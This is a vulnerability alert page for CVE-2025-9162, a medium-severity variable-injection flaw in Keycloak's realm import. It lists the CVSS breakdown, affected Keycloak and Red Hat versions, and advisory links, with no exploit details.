๐Ÿ” CVE Alert

CVE-2025-9162

MEDIUM 4.9

Org.keycloak/keycloak-model-storage-service: variable injection into environment variables

CVSS Score
4.9
EPSS Score
0.0%
EPSS Percentile
0th

A flaw was found in org.keycloak/keycloak-model-storage-service. The KeycloakRealmImport custom resource substitutes placeholders within imported realm documents, potentially referencing environment variables. This substitution process allows for injection attacks when crafted realm documents are processed. An attacker can leverage this to inject malicious content during the realm import procedure. This can lead to unintended consequences within the Keycloak environment.

CWE CWE-526
Vendor keycloak
Product keycloak
Published Aug 21, 2025
Last Updated Dec 19, 2025
Stay Ahead of the Next One

Get instant alerts for keycloak keycloak

Be the first to know when new medium vulnerabilities affecting keycloak keycloak are published โ€” delivered to Slack, Telegram or Discord.

Get Free Alerts โ†’ Free ยท No credit card ยท 60 sec setup

CVSS v3 Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Affected Versions

Keycloak / keycloak
0 < 26.3.4
Red Hat / Red Hat build of Keycloak 26.0
All versions affected
Red Hat / Red Hat build of Keycloak 26.0
All versions affected
Red Hat / Red Hat build of Keycloak 26.0
All versions affected
Red Hat / Red Hat build of Keycloak 26.0
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2
All versions affected
Red Hat / Red Hat build of Keycloak 26.2.9
All versions affected

References

NVD โ†— CVE.org โ†— EPSS Data โ†—
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15336 access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15337 access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15338 access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15339 access.redhat.com: https://access.redhat.com/errata/RHSA-2025:16399 access.redhat.com: https://access.redhat.com/errata/RHSA-2025:16400 access.redhat.com: https://access.redhat.com/security/cve/CVE-2025-9162 bugzilla.redhat.com: https://bugzilla.redhat.com/show_bug.cgi?id=2389396